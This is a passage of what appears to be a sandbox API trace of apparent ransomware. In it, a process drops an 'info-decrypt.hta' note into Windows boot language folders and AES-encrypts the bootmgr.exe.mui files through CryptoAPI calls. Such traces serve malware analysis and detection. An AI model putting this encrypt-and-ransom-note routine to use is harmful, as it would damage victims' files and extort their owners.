lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0170.800] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7df30) returned 1 [0170.800] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0170.800] GetFullPathNameW (in: lpFileName="C:\\Boot\\hu-HU", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\hu-HU", lpFilePart=0x0) returned 0xd [0170.800] GetFullPathNameW (in: lpFileName="C:\\Boot\\hu-HU\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\hu-HU\\", lpFilePart=0x0) returned 0xe [0170.801] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f890 [0170.801] FindNextFileW (in: hFindFile=0xb7f890, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0170.801] FindNextFileW (in: hFindFile=0xb7f890, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0170.801] FindNextFileW (in: hFindFile=0xb7f890, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0170.802] FindClose (in: hFindFile=0xb7f890 | out: hFindFile=0xb7f890) returned 1 [0170.802] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0170.802] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0170.802] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0170.802] GetFullPathNameW (in: lpFileName="C:\\Boot\\hu-HU", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\hu-HU", lpFilePart=0x0) returned 0xd [0170.802] GetFullPathNameW (in: lpFileName="C:\\Boot\\hu-HU\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\hu-HU\\", lpFilePart=0x0) returned 0xe [0170.802] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f890 [0170.802] FindNextFileW (in: hFindFile=0xb7f890, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0170.802] FindNextFileW (in: hFindFile=0xb7f890, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0170.802] FindNextFileW (in: hFindFile=0xb7f890, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0170.803] FindClose (in: hFindFile=0xb7f890 | out: hFindFile=0xb7f890) returned 1 [0170.803] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0170.803] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0170.803] GetFullPathNameW (in: lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\hu-HU\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0170.803] GetFullPathNameW (in: lpFileName="C:\\Boot\\hu-HU\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\hu-HU\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0170.803] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f188) returned 1 [0170.803] GetFileAttributesExW (in: lpFileName="C:\\Boot\\hu-HU\\info-decrypt.hta" (normalized: "c:\\boot\\hu-hu\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6a7f204 | out: lpFileInformation=0x6a7f204*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0170.803] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f184) returned 1 [0170.803] GetFullPathNameW (in: lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\hu-HU\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0170.803] GetFullPathNameW (in: lpFileName="C:\\Boot\\hu-HU\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\hu-HU\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0170.803] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0bc) returned 1 [0170.803] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\info-decrypt.hta" (normalized: "c:\\boot\\hu-hu\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x5a0 [0170.804] GetFileType (hFile=0x5a0) returned 0x1 [0170.804] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f0b8) returned 1 [0170.804] GetFileType (hFile=0x5a0) returned 0x1 [0170.804] WriteFile (in: hFile=0x5a0, lpBuffer=0x3931408*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6a7f180, lpOverlapped=0x0 | out: lpBuffer=0x3931408*, lpNumberOfBytesWritten=0x6a7f180*=0x1000, lpOverlapped=0x0) returned 1 [0170.805] WriteFile (in: hFile=0x5a0, lpBuffer=0x3931408*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x6a7f154, lpOverlapped=0x0 | out: lpBuffer=0x3931408*, lpNumberOfBytesWritten=0x6a7f154*=0x55e, lpOverlapped=0x0) returned 1 [0170.805] CloseHandle (hObject=0x5a0) returned 1 [0170.805] GetFullPathNameW (in: lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\hu-HU\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0170.806] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f1d4) returned 1 [0170.806] GetFileAttributesExW (in: lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x3932424 | out: lpFileInformation=0x3932424*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240)) returned 1 [0170.806] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f1d0) returned 1 [0170.806] GetFullPathNameW (in: lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec14, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\hu-HU\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0170.806] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f108) returned 1 [0170.806] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x5a0 [0170.806] GetFileType (hFile=0x5a0) returned 0x1 [0170.806] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f104) returned 1 [0170.806] GetFileType (hFile=0x5a0) returned 0x1 [0170.806] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x6a7f210 | out: lpFileSizeHigh=0x6a7f210*=0x0) returned 0x16240 [0170.807] ReadFile (in: hFile=0x5a0, lpBuffer=0x8beb9f8, nNumberOfBytesToRead=0x16240, lpNumberOfBytesRead=0x6a7f1bc, lpOverlapped=0x0 | out: lpBuffer=0x8beb9f8*, lpNumberOfBytesRead=0x6a7f1bc*=0x16240, lpOverlapped=0x0) returned 1 [0170.845] CloseHandle (hObject=0x5a0) returned 1 [0170.845] CryptAcquireContextW (in: phProv=0x6a7f15c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6a7f15c*=0x66ba850) returned 1 [0170.846] CryptGenRandom (in: hProv=0x66ba850, dwLen=0x10, pbBuffer=0x39328e4 | out: pbBuffer=0x39328e4) returned 1 [0171.573] CryptImportKey (in: hProv=0x66ba850, pbData=0x360367c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6a7f12c | out: phKey=0x6a7f12c*=0xb7fc10) returned 1 [0171.573] CryptContextAddRef (hProv=0x66ba850, pdwReserved=0x0, dwFlags=0x0) returned 1 [0171.573] CryptContextAddRef (hProv=0x66ba850, pdwReserved=0x0, dwFlags=0x0) returned 1 [0171.573] CryptDuplicateKey (in: hKey=0xb7fc10, pdwReserved=0x0, dwFlags=0x0, phKey=0x6a7f11c | out: phKey=0x6a7f11c*=0xb7f650) returned 1 [0171.573] CryptContextAddRef (hProv=0x66ba850, pdwReserved=0x0, dwFlags=0x0) returned 1 [0171.574] CryptSetKeyParam (hKey=0xb7f650, dwParam=0x4, pbData=0x360375c*=0x1, dwFlags=0x0) returned 1 [0171.574] CryptSetKeyParam (hKey=0xb7f650, dwParam=0x1, pbData=0x3603728, dwFlags=0x0) returned 1 [0171.574] CryptEncrypt (in: hKey=0xb7f650, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c01c58*, pdwDataLen=0x6a7f188*=0x16250, dwBufLen=0x16250 | out: pbData=0x8c01c58*, pdwDataLen=0x6a7f188*=0x16250) returned 1 [0171.575] CryptEncrypt (in: hKey=0xb7f650, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3603784*, pdwDataLen=0x6a7f190*=0x0, dwBufLen=0x10 | out: pbData=0x3603784*, pdwDataLen=0x6a7f190*=0x10) returned 1 [0171.576] CryptDestroyKey (hKey=0xb7fc10) returned 1 [0171.576] CryptReleaseContext (hProv=0x66ba850, dwFlags=0x0) returned 1 [0171.576] CryptReleaseContext (hProv=0x66ba850, dwFlags=0x0) returned 1 [0171.577] GetFullPathNameW (in: lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\hu-HU\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0171.577] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0f4) returned 1 [0171.577] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0171.578] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7df30) returned 1 [0171.578] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0171.578] GetFullPathNameW (in: lpFileName="C:\\Boot\\it-IT", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\it-IT", lpFilePart=0x0) returned 0xd [0171.578] GetFullPathNameW (in: lpFileName="C:\\Boot\\it-IT\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\it-IT\\", lpFilePart=0x0) returned 0xe [0171.578] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fc10 [0171.579] FindNextFileW (in: hFindFile=0xb7fc10, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0171.579] FindNextFileW (in: hFindFile=0xb7fc10, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0171.579] FindNextFileW (in: hFindFile=0xb7fc10, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0171.579] FindClose (in: hFindFile=0xb7fc10 | out: hFindFile=0xb7fc10) returned 1 [0171.579] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0171.579] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0171.580] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0171.580] GetFullPathNameW (in: lpFileName="C:\\Boot\\it-IT", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\it-IT", lpFilePart=0x0) returned 0xd [0171.580] GetFullPathNameW (in: lpFileName="C:\\Boot\\it-IT\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\it-IT\\", lpFilePart=0x0) returned 0xe [0171.580] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fc10 [0171.580] FindNextFileW (in: hFindFile=0xb7fc10, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0171.580] FindNextFileW (in: hFindFile=0xb7fc10, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0171.580] FindNextFileW (in: hFindFile=0xb7fc10, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0171.581] FindClose (in: hFindFile=0xb7fc10 | out: hFindFile=0xb7fc10) returned 1 [0171.581] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0171.581] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0171.581] GetFullPathNameW (in: lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\it-IT\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0171.581] GetFullPathNameW (in: lpFileName="C:\\Boot\\it-IT\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\it-IT\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0171.581] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f188) returned 1 [0171.581] GetFileAttributesExW (in: lpFileName="C:\\Boot\\it-IT\\info-decrypt.hta" (normalized: "c:\\boot\\it-it\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6a7f204 | out: lpFileInformation=0x6a7f204*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0171.581] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f184) returned 1 [0171.581] GetFullPathNameW (in: lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\it-IT\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0171.581] GetFullPathNameW (in: lpFileName="C:\\Boot\\it-IT\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\it-IT\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0171.581] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0bc) returned 1 [0171.581] CreateFileW (lpFileName="C:\\Boot\\it-IT\\info-decrypt.hta" (normalized: "c:\\boot\\it-it\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x4a8 [0171.677] GetFileType (hFile=0x4a8) returned 0x1 [0171.677] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f0b8) returned 1 [0171.677] GetFileType (hFile=0x4a8) returned 0x1 [0171.678] WriteFile (in: hFile=0x4a8, lpBuffer=0x36065fc*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6a7f180, lpOverlapped=0x0 | out: lpBuffer=0x36065fc*, lpNumberOfBytesWritten=0x6a7f180*=0x1000, lpOverlapped=0x0) returned 1 [0171.679] WriteFile (in: hFile=0x4a8, lpBuffer=0x36065fc*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x6a7f154, lpOverlapped=0x0 | out: lpBuffer=0x36065fc*, lpNumberOfBytesWritten=0x6a7f154*=0x55e, lpOverlapped=0x0) returned 1 [0171.679] CloseHandle (hObject=0x4a8) returned 1 [0171.680] GetFullPathNameW (in: lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\it-IT\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0171.680] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f1d4) returned 1 [0171.680] GetFileAttributesExW (in: lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x3607618 | out: lpFileInformation=0x3607618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250)) returned 1 [0171.680] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f1d0) returned 1 [0171.680] GetFullPathNameW (in: lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec14, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\it-IT\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0171.681] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f108) returned 1 [0171.681] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4a8 [0171.681] GetFileType (hFile=0x4a8) returned 0x1 [0171.681] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f104) returned 1 [0171.681] GetFileType (hFile=0x4a8) returned 0x1 [0171.681] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x6a7f210 | out: lpFileSizeHigh=0x6a7f210*=0x0) returned 0x16250 [0171.681] ReadFile (in: hFile=0x4a8, lpBuffer=0x8c17ec8, nNumberOfBytesToRead=0x16250, lpNumberOfBytesRead=0x6a7f1bc, lpOverlapped=0x0 | out: lpBuffer=0x8c17ec8*, lpNumberOfBytesRead=0x6a7f1bc*=0x16250, lpOverlapped=0x0) returned 1 [0171.730] CloseHandle (hObject=0x4a8) returned 1 [0171.730] CryptAcquireContextW (in: phProv=0x6a7f15c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6a7f15c*=0x66baaf8) returned 1 [0171.731] CryptGenRandom (in: hProv=0x66baaf8, dwLen=0x10, pbBuffer=0x3607ad8 | out: pbBuffer=0x3607ad8) returned 1 [0174.142] CryptImportKey (in: hProv=0x66baaf8, pbData=0x3674d80, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6a7f12c | out: phKey=0x6a7f12c*=0xb7fa10) returned 1 [0174.143] CryptContextAddRef (hProv=0x66baaf8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0174.143] CryptContextAddRef (hProv=0x66baaf8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0174.143] CryptDuplicateKey (in: hKey=0xb7fa10, pdwReserved=0x0, dwFlags=0x0, phKey=0x6a7f11c | out: phKey=0x6a7f11c*=0xb7f6d0) returned 1 [0174.143] CryptContextAddRef (hProv=0x66baaf8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0174.143] CryptSetKeyParam (hKey=0xb7f6d0, dwParam=0x4, pbData=0x3674e60*=0x1, dwFlags=0x0) returned 1 [0174.143] CryptSetKeyParam 